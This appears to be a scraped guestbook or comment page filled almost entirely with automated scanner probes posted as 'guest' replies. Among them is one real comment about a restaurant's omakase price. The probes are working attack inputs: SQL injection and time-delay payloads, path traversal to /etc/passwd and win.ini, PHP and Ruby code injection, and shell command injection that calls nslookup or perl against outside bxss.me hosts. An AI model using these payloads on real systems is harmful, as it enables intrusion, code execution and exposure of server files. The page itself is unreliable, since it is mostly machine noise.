\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
re: guest
'+'A'.concat(70-3).concat(22*4).concat(100).concat(78).concat(97).concat(85)+(require'socket'
Socket.gethostbyname('hithl'+'ohcumjxy05c9c.bxss.me.')[3].to_s)+'
re: guest
bxss.me/t/xss.html?%00
re: guest
WEB-INF/web.xml
re: guest
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
re: guest
WEB-INF\web.xml
re: guest
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: guest
';print(md5(31337));$a='
re: guest
";print(md5(31337));$a="
re: guest
'"
re: guest
${@print(md5(31337))}
re: guest
<!--
re: guest
${@print(md5(31337))}\
re: guest
'.print(md5(31337)).'
re: guest
1
re: guest
1
re: guest
-1 OR 2+656-656-1=0+0+0+1 --
re: guest
-1 OR 3+656-656-1=0+0+0+1 --
re: guest
-1 OR 2+969-969-1=0+0+0+1
re: guest
-1 OR 3+969-969-1=0+0+0+1
re: guest
-1' OR 2+499-499-1=0+0+0+1 --
re: guest
-1' OR 3+499-499-1=0+0+0+1 --
re: guest
-1' OR 2+702-702-1=0+0+0+1 or '5PZjSei8'='
re: guest
-1' OR 3+702-702-1=0+0+0+1 or '5PZjSei8'='
re: guest
-1" OR 2+965-965-1=0+0+0+1 --
re: guest
-1" OR 3+965-965-1=0+0+0+1 --
re: guest
if(now()=sysdate(),sleep(15),0)
re: guest
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: guest
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: guest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: guest
-1; waitfor delay '0:0:15' --
re: guest
-1); waitfor delay '0:0:15' --
re: guest
1 waitfor delay '0:0:15' --
re: guest
ib2p4jPa'; waitfor delay '0:0:15' --
re: guest
-5 OR 237=(SELECT 237 FROM PG_SLEEP(15))--
re: guest
-5) OR 871=(SELECT 871 FROM PG_SLEEP(15))--
re: guest
-1)) OR 884=(SELECT 884 FROM PG_SLEEP(15))--
re: guest
Gbmn3A0a' OR 531=(SELECT 531 FROM PG_SLEEP(15))--
re: guest
XY0OP13y') OR 316=(SELECT 316 FROM PG_SLEEP(15))--
re: guest
fUyI3Vje')) OR 132=(SELECT 132 FROM PG_SLEEP(15))--
re: guest
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: guest
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: guest
'||(select 1 from (select pg_sleep(15))x)||'
re: guest
''||(select 1 from (select pg_sleep(15))x)||''
re: guest
1'"
re: guest
@@G13F6
Wow inomata price has just increased again. 41,800 jpy on omakase.
re: guest
tTVTYOsM
re: guest
1*
re: guest
1*
re: guest
1*
re: guest
1*
re: guest
-1 OR 2+608-608-1=0+0+0+1
re: guest
-1 OR 3+608-608-1=0+0+0+1
re: guest
if(now()=sysdate(),sleep(15),0)
re: guest
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: guest
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: guest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: guest
-1; waitfor delay '0:0:15' --
re: guest
-1); waitfor delay '0:0:15' --
re: guest
1 waitfor delay '0:0:15' --
re: guest
vx2BaZDr'; waitfor delay '0:0:15' --
re: guest
-5 OR 259=(SELECT 259 FROM PG_SLEEP(15))--
re: guest
-5) OR 400=(SELECT 400 FROM PG_SLEEP(15))--
re: guest
-1)) OR 244=(SELECT 244 FROM PG_SLEEP(15))--
re: guest
gy9DqMWG' OR 995=(SELECT 995 FROM PG_SLEEP(15))--
re: guest
izlN5Jxk') OR 824=(SELECT 824 FROM PG_SLEEP(15))--
re: guest
jGYHgeTl')) OR 988=(SELECT 988 FROM PG_SLEEP(15))--
re: guest
MVcJ0vnP
re: guest
1*
re: guest
1*
re: guest
1*
re: guest
1*
re: guest
-1 OR 2+542-542-1=0+0+0+1
re: guest
-1 OR 3+542-542-1=0+0+0+1
re: guest
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: guest
if(now()=sysdate(),sleep(15),0)
re: guest
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: guest
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: guest
'||(select 1 from (select pg_sleep(15))x)||'
re: guest
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: guest
''||(select 1 from (select pg_sleep(15))x)||''
re: guest
1'"
re: guest
@@TPC9V
re: guest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: guest
-1; waitfor delay '0:0:15' --
re: guest
-1); waitfor delay '0:0:15' --
re: guest
1 waitfor delay '0:0:15' --
re: guest
Dfx8eACB'; waitfor delay '0:0:15' --
re: guest
-5 OR 252=(SELECT 252 FROM PG_SLEEP(15))--
re: guest
-5) OR 554=(SELECT 554 FROM PG_SLEEP(15))--
re: guest
-1)) OR 993=(SELECT 993 FROM PG_SLEEP(15))--
re: guest
PM5q6lVu' OR 818=(SELECT 818 FROM PG_SLEEP(15))--
re: guest
bWISltv8') OR 459=(SELECT 459 FROM PG_SLEEP(15))--
re: guest
fa6UeUDW')) OR 816=(SELECT 816 FROM PG_SLEEP(15))--
re: guest
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: guest
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: guest
'||(select 1 from (select pg_sleep(15))x)||'
re: guest
''||(select 1 from (select pg_sleep(15))x)||''
re: guest
1'"
re: guest
@@vKfbo
re: guest
1S8tvrdLO
re: guest
%0abcc:074625.67-14526.67.f3286.19990.2@bxss.me
re: guest
to@example.com>%0d%0abcc:074625.67-14527.67.f3286.19990.2@bxss.me
re: guest
response.write(9612451*9507303)
re: guest
'+response.write(9612451*9507303)+'
re: guest
"+response.write(9612451*9507303)+"
re: guest
<esi:include src="http://bxss.me/rpb.png"/>
re: guest
../../../../../../../../../../../../../../etc/passwd
re: guest
${9999375+10000326}
re: guest
../../../../../../../../../../../../../../windows/win.ini
re: guest
file:///etc/passwd
re: guest
../../../../../../../../../../../../../../../proc/version
re: guest
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
re: guest
../../../../../../../../../../etc/passwd%00.jpg
re: guest
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
re: guest
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
re: guest
)
re: guest
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
re: guest
!(()&&!|*|*|
re: guest
/etc/passwd
re: guest
^(#$!@#$)(()))******
re: guest
echo tvurji$()\ lsujdk\nz^xyu||a #' &echo tvurji$()\ lsujdk\nz^xyu||a #|" &echo tvurji$()\ lsujdk\nz^xyu||a #
re: guest
%2fetc%2fpasswd
re: guest
&echo yujvxe$()\ laofzq\nz^xyu||a #' &echo yujvxe$()\ laofzq\nz^xyu||a #|" &echo yujvxe$()\ laofzq\nz^xyu||a #
re: guest
/.././.././.././.././.././.././.././../etc/./passwd%00
re: guest
|echo jyinqs$()\ zrseqf\nz^xyu||a #' |echo jyinqs$()\ zrseqf\nz^xyu||a #|" |echo jyinqs$()\ zrseqf\nz^xyu||a #
re: guest
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
re: guest
(nslookup hitfzsbfdadag7927a.bxss.me||perl -e "gethostbyname('hitfzsbfdadag7927a.bxss.me')")
re: guest
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
re: guest
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
re: guest
$(nslookup hitecphbtehekf879e.bxss.me||perl -e "gethostbyname('hitecphbtehekf879e.bxss.me')")
re: guest
../././../././../././../././../././../././../././../././../././../././etc/passwd
re: guest
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
re: guest
'.gethostbyname(lc('hitzk'.'csyilbqy88d86.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(122).chr(72).chr(111).chr(68).'
re: guest
&nslookup hithjybxwmisl528b0.bxss.me&'\"`0&nslookup hithjybxwmisl528b0.bxss.me&`'
re: guest
Http://bxss.me/t/fit.txt
re: guest
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
re: guest
&(nslookup hitdgpqytftqy30c77.bxss.me||perl -e "gethostbyname('hitdgpqytftqy30c77.bxss.me')")&'\"`0&(nslookup hitdgpqytftqy30c77.bxss.me||perl -e "gethostbyname('hitdgpqytftqy30c77.bxss.me')")&`'
re: guest
".gethostbyname(lc("hitep"."joiredbx2b371.bxss.me."))."A".chr(67).chr(hex("58")).chr(111).chr(79).chr(104).chr(78)."
re: guest
http://bxss.me/t/fit.txt%3F.jpg
re: guest
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
re: guest
|(nslookup hityejwuvivnx5526d.bxss.me||perl -e "gethostbyname('hityejwuvivnx5526d.bxss.me')")
re: guest
/etc/shells
re: guest
`(nslookup hiteewfveiced711ba.bxss.me||perl -e "gethostbyname('hiteewfveiced711ba.bxss.me')")`
re: guest
file:///etc/passwd
re: guest
c:/windows/win.ini
re: guest
;(nslookup hitmxyvyerajv4a2c5.bxss.me||perl -e "gethostbyname('hitmxyvyerajv4a2c5.bxss.me')")|(nslookup hitmxyvyerajv4a2c5.bxss.me||perl -e "gethostbyname('hitmxyvyerajv4a2c5.bxss.me')")&(nslookup hitmxyvyerajv4a2c5.bxss.me||perl -e "gethostbyname('hitmxyvyerajv4a2c5.bxss.me')")
re: guest
/\../\../\../\../\../\../\../etc/passwd
re: guest
bxss.me
re: guest
/WEB-INF/web.xml
re: guest
C:\WINDOWS\system32\drivers\etc\hosts
re: guest
../../../../../../../../../../windows/win.ini%00.jpg
re: guest
/../../../../../../../../../../boot.ini
re: guest
HttP://bxss.me/t/xss.html?%00
re: guest
"+"A".concat(70-3).concat(22*4).concat(109).concat(90).concat(106).concat(84)+(require"socket"
Socket.gethostbyname("hitmq"+"wprjsssmc5f73.bxss.me.")[3].to_s)+"
re: guest
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
re: guest
bxss.me/t/xss.html?%00
re: guest
'+'A'.concat(70-3).concat(22*4).concat(109).concat(65).concat(105).concat(72)+(require'socket'
Socket.gethostbyname('hitvp'+'oszeeteb1c6c9.bxss.me.')[3].to_s)+'
re: guest
..\..\..\..\..\..\..\..\windows\win.ini
re: guest
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
re: guest
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
re: guest
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: guest
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
re: guest
';print(md5(31337));$a='
re: guest
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
re: guest
";print(md5(31337));$a="
re: guest
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
re: guest
'"
re: guest
${@print(md5(31337))}
re: guest
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
re: guest
<!--
re: guest
${@print(md5(31337))}\
re: guest
WEB-INF/web.xml
re: guest
'.print(md5(31337)).'
re: guest
WEB-INF\web.xml
re: guest
1
re: guest
1
re: guest
-1 OR 2+448-448-1=0+0+0+1 --
re: guest
-1 OR 3+448-448-1=0+0+0+1 --
re: guest
-1 OR 2+746-746-1=0+0+0+1
re: guest
-1 OR 3+746-746-1=0+0+0+1
re: guest
-1' OR 2+367-367-1=0+0+0+1 --
re: guest
-1' OR 3+367-367-1=0+0+0+1 --
re: guest
-1' OR 2+494-494-1=0+0+0+1 or 'nZ4F4LRD'='
re: guest
-1' OR 3+494-494-1=0+0+0+1 or 'nZ4F4LRD'='
re: guest
-1" OR 2+415-415-1=0+0+0+1 --
re: guest
-1" OR 3+415-415-1=0+0+0+1 --
re: guest
if(now()=sysdate(),sleep(15),0)
re: guest
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: guest
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: guest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: guest
-1; waitfor delay '0:0:15' --
re: guest
-1); waitfor delay '0:0:15' --
re: guest
1 waitfor delay '0:0:15' --
re: guest
LE6Mumfk'; waitfor delay '0:0:15' --
re: guest
-5 OR 243=(SELECT 243 FROM PG_SLEEP(15))--
re: guest
-5) OR 730=(SELECT 730 FROM PG_SLEEP(15))--
re: guest
-1)) OR 879=(SELECT 879 FROM PG_SLEEP(15))--
re: guest
ZvGavnTh' OR 495=(SELECT 495 FROM PG_SLEEP(15))--
re: guest
7Gs4XSJi') OR 548=(SELECT 548 FROM PG_SLEEP(15))--
